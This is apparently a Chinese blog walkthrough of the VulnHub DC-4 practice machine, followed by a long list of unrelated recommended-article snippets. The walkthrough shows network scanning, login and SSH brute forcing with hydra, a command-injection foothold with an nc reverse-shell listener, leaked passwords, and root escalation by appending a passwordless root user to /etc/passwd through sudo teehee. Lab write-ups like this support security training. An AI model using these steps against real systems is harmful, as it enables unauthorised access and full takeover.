夜yesir
夜yesir

渗透测试靶机vulnhub——DC4实战笔记

信息收集

fscan扫描存活主机

PS C:\Users\lenovo\Desktop\HackTool> .\fscan64.exe -h 192.168.1.0/24

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.2
start infoscan
(icmp) Target 192.168.1.53    is alive
(icmp) Target 192.168.1.108   is alive
(icmp) Target 192.168.1.1     is alive
(icmp) Target 192.168.1.104   is alive
(icmp) Target 192.168.1.105   is alive
(icmp) Target 192.168.1.109   is alive
[*] Icmp alive hosts len is: 6

确定目标主机是192.168.1.105

namp扫描端口

 nmap -A 192.168.1.105 -p-                                                     
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-20 10:11 CST
Nmap scan report for 192.168.1.105
Host is up (0.00058s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open  http    nginx 1.15.10
|_http-title: System Tools
|_http-server-header: nginx/1.15.10
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.24 seconds
zsh: segmentation fault  nmap -A 192.168.1.105 -p-

开放了22和80端口,直接访问web服务

渗透测试靶机vulnhub——DC4实战笔记_第1张图片

就一个登录框

暴力破解

直接爆破密码

渗透测试靶机vulnhub——DC4实战笔记_第2张图片

爆出密码是happy

渗透测试靶机vulnhub——DC4实战笔记_第3张图片

命令执行

登进去一看是命令执行漏洞

渗透测试靶机vulnhub——DC4实战笔记_第4张图片

抓包修改参数,查看用户

渗透测试靶机vulnhub——DC4实战笔记_第5张图片

查看到有三个用户,charles、jim、sam

渗透测试靶机vulnhub——DC4实战笔记_第6张图片

nc反弹shell

nc -lvp 9999
渗透测试靶机vulnhub——DC4实战笔记_第7张图片

python切换shell

python3 -c "import pty;pty.spawn('/bin/bash')"
渗透测试靶机vulnhub——DC4实战笔记_第8张图片

在/home/jim目录下发现文件old-passwords.bak文件,查看,可以作为爆破ssh的密码字典

渗透测试靶机vulnhub——DC4实战笔记_第9张图片

复制保存到kali

爆破ssh

└─$ sudo hydra -l jim -P pass.txt ssh://192.168.1.105

最后密码是jibril04

渗透测试靶机vulnhub——DC4实战笔记_第10张图片

登录提示you have mail

渗透测试靶机vulnhub——DC4实战笔记_第11张图片

存在Charles的密码Password is: ^xHhA&hvim0y

切换用户

su charles

sudo提权

sudo -l
渗透测试靶机vulnhub——DC4实战笔记_第12张图片

有最追加写入文件功能的时候,直接往 /etc/passwd 里加个root用户

teehee提权

passwd的格式:[⽤户名]:[密码]:[UID]:[GID]:[⾝份描述]:[主⽬录]:[登录shell]
echo "yesir::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
渗透测试靶机vulnhub——DC4实战笔记_第13张图片
渗透测试靶机vulnhub——DC4实战笔记_第14张图片

flag

渗透测试靶机vulnhub——DC4实战笔记_第15张图片

他帮你驱散黑暗,我却带给你光明。可,你心里没有我

渗透测试靶机vulnhub——DC4实战笔记_第16张图片

你可能感兴趣的:(靶机实战笔记,安全,系统安全,网络安全,安全,php)

  • 2021国家开放大学计算机网络安全技术形成性考核五 chaoliang.top 国开试题网络安全网络安全
    本人还会继续更新其他国家开放大学的试题,请大家多多关注,如果有什么建议,还希望大家提出来,本人也好完善本人在测试答案的时候发现,本章考试回顾结果中明明选对了答案,但是提示错误的情况,并且该题没有提示正确答案,这种情况应该是国开试题出现bug导致,请大家不要担心,如果有追求完美的同学,多答几次,可能就会避开这种题,因为出题是随机的。1.SQL注入一般可通过网页表单直接输入选择多项:对错正确答案:对2
  • 如何提高网络安全意识 亿林网络安全事业部 网络web安全安全
    提升网络安全意识的方法提升网络安全意识是个人和企业都需要重视的问题。以下是一些有效的方法:加强教育和培训:通过参加网络安全培训课程,学习识别网络攻击的常见迹象、安全密码的设置、不点击可疑链接等知识。建立网络安全政策:制定个人网络安全规则,如定期更改密码、不在公共网络上进行敏感操作等。定期更新系统:保持操作系统和软件程序的最新状态,及时修补安全漏洞。加强网络防护:使用防火墙、反病毒软件、入侵检测系统
  • 基于django+vue代驾管理系统【开题报告+程序+论文】-计算机毕设 zhjie102 djangovue.js课程设计
    本系统(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。系统程序文件列表开题报告内容研究背景随着城市化进程的加速和人们生活水平的提高,私家车数量急剧增加,但随之而来的酒驾问题也日益严峻,严重威胁着道路交通安全与公众生命财产安全。为了有效遏制酒驾行为,代驾服务应运而生并迅速普及。然而,当前市场上的代驾服务大多依赖于电话预约、人工调度等传统方式,存在效率低下
  • 【Redis】Redis缓存 1886i JavaRedis缓存redis数据库
    目录一、缓存1、概念2、作用3、缺点二、缓存模型三、缓存的更新1、更新策略2、主动更新的三种模式1.cacheasidepattern2.read/writethroughpattern3.writebehindcachingpattern3、线程安全问题1.缓存删除还是更新缓存2.先删除缓存后操作数据库3.先操作数据库后删除缓存4.如何保证缓存与数据库操作同时成功或失败4、最佳选择一、缓存1、概
  • CTF——web方向学习攻略 一则孤庸 CTF网络安全CTF
    1计算机基础操作系统:熟悉Linux命令,方便使用Kali。网络技术:HCNA、CCNA。编程能力:拔高项,有更好。2web应用HTTP协议:必须掌握web开发框架web安全测试3数据库数据库基本操作SQL语句数据库优化4刷题
  • 这世上唯一不变的,就是变化。 野生俊
    曾经一句改变自己是神,改变别人是神经病风靡全网,给了不愿改变者多了一个不改变的借口。我们经常听到身边的同事在做错事或造成损失,就说下次改,或者因为不够专注而受轻伤,总结说下次一定注意安全,但是现在发生的事与多年以前发生的事所带来的遗憾或错,很多却是一样的性质,那我们是否反省,以前没改掉,下次凭什么改变呢。很多时候听到说我知道是自己的问题,下次调整,可是结果下次还是一样。改变自己不是因为看了两本书,
  • SpringBoot3与SpringBoot2的区别 bjzhang75 springboot
    文章目录1、JDK环境2、SpringFramework版本3、主要变化和新特性3.1配置变化3.2GraalVM3.3安全性改进3.4性能优化3.4.1启动时间3.4.2内存使用3.5改进的依赖管理3.6全新启动器3.7Kotlin支持SpringBoot3与SpringBoot2的区别1、JDK环境SpringBoot3最低要求JDK17SpringBoot2最低要求JDK82、SpringF
  • Python中的“Try...Except...Finally”:掌握异常处理的艺术 小鹿( ﹡ˆoˆ﹡ ) Pythonpython开发语言Python
    在编程的世界里,错误与异常就像是旅途中的迷雾,虽然不可避免,但通过正确的导航工具,我们可以安全地穿越。Python作为一种广泛使用的编程语言,提供了丰富的工具来帮助我们处理这些异常情况,其中之一便是“Try…Except…Finally”结构。本文将带你深入了解这一机制的核心概念、实际应用以及如何利用它来提升代码的健壮性和可维护性,无论你是刚入门的新手还是经验丰富的开发人员,都能从中受益匪浅。引言
  • 小女孩天台玩“死亡游戏”:儿童世界里,有多少种“危险关系”? 九力国际教育综合体
    这几天,一个视频让无数人胆战心惊。一个蓝衣女孩,带着两个大约七八岁的女童,爬上了高楼楼顶露天天台,并翻过天台的栏杆,正在玩着危险的游戏。在她们的身边,没有任何防护,稍有不慎万丈深渊。更让人背脊发冷的是,两个女童还在相互搀扶着往天台边缘后移。再反观蓝衣女孩,自己则站在安全的角落,紧紧抱着栏杆,对着两个女童喊着:松手,松手。image所幸,视频拍摄者发现了这一幕,用温柔的声音把两个女童劝回到防护栏里面
  • 危化品生产单位两类人员安全考核试题 安建资小栗子 安全
    判断题1、为防止雷电波入侵重要用户,最好采用全电缆供电,将其金属外皮接零。正确答案:错2、保护接地的作用是限制漏电设备的对地电压,使其不超出安全*围。正确答案:对3、在触电事故中携带式和移动式电器设备触电事故较多。(1.0分)正确答案:对4、在易燃环境中不要穿化纤织物的工作服。(1.0分)正确答案:对5、生产使用的机械设备必须建立健全安装、使用、检查、维修、保养制度,不准超温、超压、超负荷运行,在
  • 上海安全员C证继续教育题库(附答案) 安建资小栗子 其他
    1.从业人员经过安全教育培训,了解岗位操作规程,但未遵守而造成事故的,行为人应负()责任,有关负责人应负()责任。A.直接间接B.直接领导C.间接管理D.直接管理2.对生产附着式升降脚手架产品的单位,必须经()组织鉴定合格并发给生产和使用证后,方可向全国各地提供产品。A.国家安全监督总局B.国家质量监督总局C.住房和城乡建设部D.当地建设行政主管部门3.建筑施工进行高处作业之前,应进行安全防护设施
  • 还有哪个地方能申请到免费一年期的SSL证书? alsknv 服务器https运维ssl网络协议httptcp/ip
    SSL证书是互联网中用于加密网站与访问者之间数据传输的安全证书。它通过数字签名确认网站的真实身份,确保数据传输的私密性、完整性和服务器身份的真实性,有效防止数据在传输过程中被窃取或篡改,是保障网站安全性的重要手段。永久免费SSL证书_永久免费https证书_永久免费ssl证书申请-JoySSL真正完全且永久免费!不用您花一分钱,SSL证书免费使用90天,并且还支持连续签发。JoySSL携手全球权威
  • 绘本讲师训练营【19期】2/21 阅读原创《幸福的种子》 coco_c71d
    图片发自App19103朱婷一、图书与幼儿的世界从幼儿时期开始,我们的孩子已经懂的了感受,母亲,是给孩子感受最重要的人.母亲才是婴儿生存的最大力量与依靠,母亲的温柔、爱都会是婴儿最安全的感受.所以母亲要丰富自己的情感与认知,然后再将这些饱含艺术家们的情感、认知,悄悄的播种在孩子的心中,与孩子建立亲密的关系.幼儿时的快乐是和朋友、兄弟姐妹一起,和母亲一起的幸福,幼儿时的孩子看不懂任何书,他只能看着图
  • 无聊死了 龙族
    最近不是出来了那种新型的冠状病毒吗?我的爸妈为了我的安全,天天把我关在家里,不能出去,只能拿来看电视,电视放着,结果突然黑屏了,这更让我感到崩溃。我的爸妈实在是对我无可奈何,就让我去玩姐姐的平板电脑,话说试玩其实还不如说是看,因为我的爸爸妈妈从来都不让我玩游戏,所以我只能看一些关于我热爱的MC的解说。这几天都是一日复一日几个东西,真是无聊死了,我当初就是应该把一些作业留到现在写,至少还有点活干,可
  • 华为 HCIP 认证费用和报名资格 咕噜Yuki0609 华为培训认证HCIP华为认证
    在当今竞争激烈的信息技术领域,华为HCIP认证备受关注。它不仅能提升个人的技术实力与职业竞争力,也为企业选拔优秀人才提供了重要依据。以下将详细介绍华为HCIP认证的费用和报名资格。一、HCIP认证费用华为HCIP认证的费用主要由考试费和培训费构成。1.考试费用:根据不同的技术方向,考试费用有所差异。例如,数通、安全等方向的考试费用通常为480美元;WLAN方向的考试费用为600美元;物联网方向的考
  • 鸿萌数据恢复服务:如何恢复 Mac 系统中被擦除的文件? 鸿萌数据安全 macos恢复被擦除的mac文件擦除mac文件mac数据恢复
    天津鸿萌科贸发展有限公司从事数据安全服务二十余年,致力于为各领域客户提供专业的数据备份、数据恢复解决方案与服务,并针对企业面临的数据安全风险,提供专业的相关数据安全培训。公司是多款国际主流数据恢复软件的授权代理商,为数据恢复公司、数据取证机构及有专业技能的个人或企业提供官方正版软件产品。文章内容:1.文件擦除与文件删除:它们有什么不同?2.什么时候需要擦除文件3.有没有办法恢复Mac中被擦除的文件
  • 看到 南明海辰
    《看到》南明海辰写于20190507当我睁开眼睛第一次看到这世界不知那时我是否知道有一天,我要离开温暖安全的襁褓只会嘤嘤的嘴巴会说很多好听或者伤人的话只会弹跳的小脚可以迈着如风的步子走那么多的路已经走过的正在走着的将要走上的我的还无法完全自控的面部会有那么丰富的或真或假的表情我是十岁时常听大人们感慨——明年小丫头就十一岁了岁月不饶人可我从没想过人为什么过了十岁要过十一岁虽然,十一确实比十大到了二十
  • Java-后端程序员个人知识总结 金肴羽 java开发语言
    文章目录概要1.编程语言2.数据结构与算法3.数据库知识4.框架和库5.服务器管理6.网络知识7.版本控制8.测试9.安全知识10.系统设计11.编码规范与最佳实践12.持续学习和适应能力概要后端程序员,主要负责应用程序的逻辑、数据库交互、服务器配置以及应用的性能优化等。成为一名优秀的后台程序员,需要掌握以下技能:1.编程语言掌握至少一种后台编程语言JavaPythonHtmlJavaScript
  • [AI资讯·0605] GLM-4系列开源模型,OpenAI安全疑云,ARM推出终端计算子系统,猿辅导大模型备案…… 老牛同学 AI人工智能ai大模型AI资讯
    AI资讯1毛钱1百万token,写2遍红楼梦!国产大模型下一步还想卷什么?AI「末日」突然来临,公司同事集体变蠢!只因四大聊天机器人同时宕机OpenAI员工们开始反抗了!AI手机PC大爆发,Arm从软硬件到生态发力,打造行业AI百宝箱GLM-4开源版本:超越Llama3,多模态比肩GPT4V,MaaS平台也大升级猿辅导竟然是一家AI公司?大模型全家桶曝光|甲子光年FineChatBI,帆软在AI方
  • 华纳云:修复WordPress内存耗尽错误的常用方法有哪些? 华纳云IDC服务商 服务器WordPress
    WordPress内存耗尽错误通常是由于PHP内存限制不足导致的。修复这种错误的方法有多种,以下是几种常用的方法:1.修改wp-config.php文件在WordPress根目录的wp-config.php文件中添加或修改以下代码,增加PHP的内存限制:define('WP_MEMORY_LIMIT','256M');将256M替换为所需的内存值。例如,可以将其设置为128M,256M,512M等
  • Oracle数据库中的Oracle Label Security是什么 2401_85812026 javascript开发语言ecmascript
    OracleLabelSecurity(OLS)是Oracle数据库中的一个强大特性,它提供了基于标签的行级安全性控制。通过OLS,组织可以实施细粒度的数据访问控制,确保用户只能访问他们被授权的数据。OracleLabelSecurity的工作原理OLS通过定义一系列的标签和安全策略来控制对数据库中数据的访问。每个数据行都会被分配一个或多个标签,而用户或应用程序的会话也会被分配一个标签。当用户尝试
  • 2019-12-20 雨遥高效阅读
    昨天约了供应商来谈价钱,今天早上,对方如约而至。对方一看就是有备而来,而我却底气不足,因为价钱谈判这块,我就是空白的,我只能强装淡定,来掩盖我的不自信。果然,对方侃侃而谈,一会是市场,一会是技术,一会又是项目背景的,我真的毫无还手之力,全是对方在掌控节奏。价钱当然也没有谈下来,对方只是相应的优惠了一点金额,并没有降点。自己对于技术,安全设备的市场一点知识储存量都没有,而对方是已经混了十几年的老江湖
  • 2022-12-17 你好南方
    今天一睁眼就看看暖暖的阳光从窗户偷偷进了房间,又一个美好的一天开始。早早起床去下了炝锅面,前几天早上都是煮粥,今天换一下。吃了面,洗漱完毕整理好一切准备上课,这几天上课的孩子明显减少,看今天怎样吧,这样下去真不是事儿。我今天的客户上周就联系好了今天过来试课报名,期待了这么久,不会又泡汤吧。不过也不奇怪,马上要过年了,春节后再报名也不迟,也在不乎这几天,反过来我是家长,单单从安全角度来说我也会选择在
  • 《有感就发》之31:下山更比上山难 回家烧茶
    图片发自App上山不易,下山更难!人生亦如此。成功冲顶珠峰的人廖廖,大多数人当时并非不具一鼓作气登顶能力,而是已无登顶后安全回撤的体力储备,不得已而为之。然在仕途上人们普遍苦苦追求向上攀爬,少有适可而止,以至有些人登得了顶,却下不了山,周令郭徐之流是为典型,可悲、可叹、可怜!吾辈可鉴。
  • 2020/12/17感恩日记 德胜
    感恩感谢自己的皮肤越来越好越来越年轻态,感恩感谢敏姐同学于教授的产品和私人订制的产品,给我们带来安全美丽的产品。感恩感谢好种子开花结果带给我的回向和收获,感恩感谢坏种子爆破带给我的教训和改变,感恩感谢咖啡冥想的力量给我强大的力量和美好善愿一一实现,感恩感谢家人们都平安健康。感恩感谢先生的事业顺利,财源茂盛。感恩感谢需要帮忙的人都能得到帮助。感恩感谢孙总和侯总的支持和帮助。
  • 重塑未来:碳捕集与存储(CCS)的革命性突破与可持续发展路径 给生活加糖! 热门知识大数据人工智能
    随着全球气候变化的加剧,减少二氧化碳(CO₂)排放已成为应对气候变化的关键任务之一。碳捕集与存储(CCS)技术因其能够直接从源头捕捉CO₂并将其安全存储,避免其进入大气层,而受到广泛关注。CCS被认为是实现气候目标,尤其是在高排放行业中实现碳中和的一个重要手段。本文将详细探讨CCS的工作原理、技术类型、应用领域、面临的挑战以及未来的发展方向。一、碳捕集与存储的概念与重要性1.碳捕集与存储的定义碳捕
  • #LLM入门|Prompt#2.3_对查询任务进行分类|意图分析_Classification 向日葵花籽儿 LLM入门教程笔记prompt分类数据库
    在本章中,我们将重点探讨评估输入任务的重要性,这关乎到整个系统的质量和安全性。在处理不同情况下的多个独立指令集的任务时,首先对查询类型进行分类,并以此为基础确定要使用哪些指令,具有诸多优势。这可以通过定义固定类别和硬编码与处理特定类别任务相关的指令来实现。例如,在构建客户服务助手时,对查询类型进行分类并根据分类确定要使用的指令可能非常关键。具体来说,如果用户要求关闭其账户,那么二级指令可能是添加有
  • 打卡D6#/21 水色斑斓S
    图片发自AppD6#案主信息:女性,31岁,药店上班画的名字:向往画面要怎么描述,就一个简单的房子,一颗树,还有草地,石阶,还有一个我。分析:画者将人物放在最右边且房子没有窗户、门小,显示其内心安全感不足,性格偏保守、内向、被动、柔弱、随性,依赖性性强,不太擅长跟陌生人打交道,自我保护意识强,希望别人主动走进内心,想象力丰富,喜欢幻想,内心能量不够强大,拥有爱心,自控力强,不愿意承担责任。
  • Java面试必问之Hashmap底层实现原理(JDK1.7) 当我遇上你csy Java基础javahashmap面试源码
    1.前言Hashmap可以说是Java面试必问的,一般的面试题会问:Hashmap有哪些特性?Hashmap底层实现原理(get\put\resize)Hashmap怎么解决hash冲突?Hashmap是线程安全的吗?…今天就从源码角度一探究竟。笔者的源码是OpenJDK1.72.构造方法首先看构造方法的源码//默认初始容量staticfinalintDEFAULT_INITIAL_CAPACIT
  • AI算法部署方式对比分析:哪种方案性价比最高? TSINGSEE AI智能人工智能视频监控技术安防视频监控
    随着人工智能技术的飞速发展,AI算法在各个领域的应用日益广泛。AI算法的部署方式直接关系到系统的性能、实时性、成本及安全性等多个方面。本文将探讨AI算法分析的三种主要部署方式:本地计算、边缘计算和云计算,并详细分析它们的优劣性。一、本地计算1)部署方式本地计算是指将AI算法直接部署在摄像头或其他终端设备上。这种部署方式使得数据处理和分析在设备本地完成,无需通过网络传输数据。2)优点高效实时:由于数
  • mysql主从数据同步 林鹤霄 mysql主从数据同步
    配置mysql5.5主从服务器(转) 教程开始:一、安装MySQL 说明:在两台MySQL服务器192.168.21.169和192.168.21.168上分别进行如下操作,安装MySQL 5.5.22  二、配置MySQL主服务器(192.168.21.169)mysql  -uroot  -p   &nb
  • oracle学习笔记 caoyong oracle
    1、ORACLE的安装    a>、ORACLE的版本    8i,9i :   i是internet    10g,11g : grid (网格)    12c : cloud (云计算)       b>、10g不支持win7 &
  • 数据库,SQL零基础入门 天子之骄 sql数据库入门基本术语
    数据库,SQL零基础入门        做网站肯定离不开数据库,本人之前没怎么具体接触SQL,这几天起早贪黑得各种入门,恶补脑洞。一些具体的知识点,可以让小白不再迷茫的术语,拿来与大家分享。          数据库,永久数据的一个或多个大型结构化集合,通常与更新和查询数据的软件相关
  • pom.xml 一炮送你回车库 pom.xml
    1、一级元素dependencies是可以被子项目继承的 2、一级元素dependencyManagement是定义该项目群里jar包版本号的,通常和一级元素properties一起使用,既然有继承,也肯定有一级元素modules来定义子元素 3、父项目里的一级元素<modules> <module>lcas-admin-war</module> <
  • sql查地区省市县 3213213333332132 sqlmysql
    -- db_yhm_city SELECT * FROM db_yhm_city WHERE class_parent_id = 1 -- 海南 class_id = 9 港、奥、台 class_id = 33、34、35 SELECT * FROM db_yhm_city WHERE class_parent_id =169 SELECT d1.cla
  • 关于监听器那些让人头疼的事 宝剑锋梅花香 画图板监听器鼠标监听器
           本人初学JAVA,对于界面开发我只能说有点蛋疼,用JAVA来做界面的话确实需要一定的耐心(不使用插件,就算使用插件的话也没好多少)既然Java提供了界面开发,老师又要求做,只能硬着头皮上啦。但是监听器还真是个难懂的地方,我是上了几次课才略微搞懂了些。       
  • JAVA的遍历MAP darkranger map
    Java Map遍历方式的选择 1. 阐述   对于Java中Map的遍历方式,很多文章都推荐使用entrySet,认为其比keySet的效率高很多。理由是:entrySet方法一次拿到所有key和value的集合;而keySet拿到的只是key的集合,针对每个key,都要去Map中额外查找一次value,从而降低了总体效率。那么实际情况如何呢?   为了解遍历性能的真实差距,包括在遍历ke
  • POJ 2312 Battle City 优先多列+bfs aijuans 搜索
    来源:http://poj.org/problem?id=2312 题意:题目背景就是小时候玩的坦克大战,求从起点到终点最少需要多少步。已知S和R是不能走得,E是空的,可以走,B是砖,只有打掉后才可以通过。 思路:很容易看出来这是一道广搜的题目,但是因为走E和走B所需要的时间不一样,因此不能用普通的队列存点。因为对于走B来说,要先打掉砖才能通过,所以我们可以理解为走B需要两步,而走E是指需要1
  • Hibernate与Jpa的关系,终于弄懂 avords javaHibernate数据库jpa
    我知道Jpa是一种规范,而Hibernate是它的一种实现。除了Hibernate,还有EclipseLink(曾经的toplink),OpenJPA等可供选择,所以使用Jpa的一个好处是,可以更换实现而不必改动太多代码。 在play中定义Model时,使用的是jpa的annotations,比如javax.persistence.Entity, Table, Column, OneToMany
  • 酸爽的console.log bee1314 console
    在前端的开发中,console.log那是开发必备啊,简直直观。通过写小函数,组合大功能。更容易测试。但是在打版本时,就要删除console.log,打完版本进入开发状态又要添加,真不够爽。重复劳动太多。所以可以做些简单地封装,方便开发和上线。 /** * log.js hufeng * The safe wrapper for `console.xxx` functions *
  • 哈佛教授:穷人和过于忙碌的人有一个共同思维特质 bijian1013 时间管理励志人生穷人过于忙碌
            一个跨学科团队今年完成了一项对资源稀缺状况下人的思维方式的研究,结论是:穷人和过于忙碌的人有一个共同思维特质,即注意力被稀缺资源过分占据,引起认知和判断力的全面下降。这项研究是心理学、行为经济学和政策研究学者协作的典范。   这个研究源于穆来纳森对自己拖延症的憎恨。他7岁从印度移民美国,很快就如鱼得水,哈佛毕业
  • other operate 征客丶 OSosx
    一、Mac Finder 设置排序方式,预览栏 在显示-》查看显示选项中 二、有时预览显示时,卡死在那,有可能是一些临时文件夹被删除了,如:/private/tmp[有待验证] -------------------------------------------------------------------- 若有其他凝问或文中有错误,请及时向我指出, 我好及时改正,同时也让我们一
  • 【Scala五】分析Spark源代码总结的Scala语法三 bit1129 scala
    1. If语句作为表达式 val properties = if (jobIdToActiveJob.contains(jobId)) { jobIdToActiveJob(stage.jobId).properties } else { // this stage will be assigned to "default" po
  • ZooKeeper 入门 BlueSkator 中间件zk
    ZooKeeper是一个高可用的分布式数据管理与系统协调框架。基于对Paxos算法的实现,使该框架保证了分布式环境中数据的强一致性,也正是基于这样的特性,使得ZooKeeper解决很多分布式问题。网上对ZK的应用场景也有不少介绍,本文将结合作者身边的项目例子,系统地对ZK的应用场景进行一个分门归类的介绍。 值得注意的是,ZK并非天生就是为这些应用场景设计的,都是后来众多开发者根据其框架的特性,利
  • MySQL取得当前时间的函数是什么 格式化日期的函数是什么 BreakingBad mysqlDate
    取得当前时间用 now() 就行。 在数据库中格式化时间 用DATE_FORMA T(date, format) . 根据格式串format 格式化日期或日期和时间值date,返回结果串。 可用DATE_FORMAT( ) 来格式化DATE 或DATETIME 值,以便得到所希望的格式。根据format字符串格式化date值: %S, %s 两位数字形式的秒( 00,01,
  • 读《研磨设计模式》-代码笔记-组合模式 bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ import java.util.ArrayList; import java.util.List; abstract class Component { public abstract void printStruct(Str
  • 4_JAVA+Oracle面试题(有答案) chenke oracle
    基础测试题 卷面上不能出现任何的涂写文字,所有的答案要求写在答题纸上,考卷不得带走。 选择题 1、 What will happen when you attempt to compile and run the following code? (3) public class Static { static { int x = 5; // 在static内有效 } st
  • 新一代工作流系统设计目标 comsci 工作算法脚本
      用户只需要给工作流系统制定若干个需求,流程系统根据需求,并结合事先输入的组织机构和权限结构,调用若干算法,在流程展示版面上面显示出系统自动生成的流程图,然后由用户根据实际情况对该流程图进行微调,直到满意为止,流程在运行过程中,系统和用户可以根据情况对流程进行实时的调整,包括拓扑结构的调整,权限的调整,内置脚本的调整。。。。。 在这个设计中,最难的地方是系统根据什么来生成流
  • oracle 行链接与行迁移 daizj oracle行迁移
    表里的一行对于一个数据块太大的情况有二种(一行在一个数据块里放不下) 第一种情况: INSERT的时候,INSERT时候行的大小就超一个块的大小。Oracle把这行的数据存储在一连串的数据块里(Oracle Stores the data for the row in a chain of data blocks),这种情况称为行链接(Row Chain),一般不可避免(除非使用更大的数据
  • [JShop]开源电子商务系统jshop的系统缓存实现 dinguangx jshop电子商务
    前言 jeeshop中通过SystemManager管理了大量的缓存数据,来提升系统的性能,但这些缓存数据全部都是存放于内存中的,无法满足特定场景的数据更新(如集群环境)。JShop对jeeshop的缓存机制进行了扩展,提供CacheProvider来辅助SystemManager管理这些缓存数据,通过CacheProvider,可以把缓存存放在内存,ehcache,redis,memcache
  • 初三全学年难记忆单词 dcj3sjt126com englishword
    several 儿子;若干 shelf 架子 knowledge 知识;学问 librarian 图书管理员 abroad 到国外,在国外 surf 冲浪 wave 浪;波浪 twice 两次;两倍 describe 描写;叙述 especially 特别;尤其 attract 吸引 prize 奖品;奖赏 competition 比赛;竞争 event 大事;事件 O
  • sphinx实践 dcj3sjt126com sphinx
      安装参考地址:http://briansnelson.com/How_to_install_Sphinx_on_Centos_Server   yum install sphinx 如果失败的话使用下面的方式安装 wget http://sphinxsearch.com/files/sphinx-2.2.9-1.rhel6.x86_64.rpm yum loca
  • JPA之JPQL(三) frank1234 ormjpaJPQL
    1 什么是JPQL JPQL是Java Persistence Query Language的简称,可以看成是JPA中的HQL, JPQL支持各种复杂查询。 2 检索单个对象 @Test public  void querySingleObject1() {     Query query = em.createQuery("sele
  • Remove Duplicates from Sorted Array II hcx2013 remove
    Follow up for "Remove Duplicates":What if duplicates are allowed at most twice? For example,Given sorted array nums = [1,1,1,2,2,3], Your function should return length
  • Spring4新特性——Groovy Bean定义DSL jinnianshilongnian spring 4
    Spring4新特性——泛型限定式依赖注入 Spring4新特性——核心容器的其他改进 Spring4新特性——Web开发的增强 Spring4新特性——集成Bean Validation 1.1(JSR-349)到SpringMVC  Spring4新特性——Groovy Bean定义DSL Spring4新特性——更好的Java泛型操作API  Spring4新
  • CentOS安装Mysql5.5 liuxingguome centos
    CentOS下以RPM方式安装MySQL5.5 首先卸载系统自带Mysql: yum remove mysql mysql-server mysql-libs compat-mysql51 rm -rf /var/lib/mysql rm /etc/my.cnf 查看是否还有mysql软件: rpm -qa|grep mysql 去http://dev.mysql.c
  • 第14章 工具函数(下) onestopweb 函数
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • POJ 1050 SaraWon 二维数组子矩阵最大和
    POJ ACM第1050题的详细描述,请参照 http://acm.pku.edu.cn/JudgeOnline/problem?id=1050 题目意思: 给定包含有正负整型的二维数组,找出所有子矩阵的和的最大值。 如二维数组 0 -2 -7 0 9 2 -6 2 -4 1 -4 1 -1 8 0 -2 中和最大的子矩阵是 9 2 -4 1 -1 8 且最大和是15
  • [5]设计模式——单例模式 tsface java单例设计模式虚拟机
    单例模式:保证一个类仅有一个实例,并提供一个访问它的全局访问点   安全的单例模式:     /* * @(#)Singleton.java 2014-8-1 * * Copyright 2014 XXXX, Inc. All rights reserved. */ package com.fiberhome.singleton;
  • Java8全新打造,英语学习supertool yangshangchuan javasuperword闭包java8函数式编程
    superword是一个Java实现的英文单词分析软件,主要研究英语单词音近形似转化规律、前缀后缀规律、词之间的相似性规律等等。Clean code、Fluent style、Java8 feature: Lambdas, Streams and Functional-style Programming。   升学考试、工作求职、充电提高,都少不了英语的身影,英语对我们来说实在太重要
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他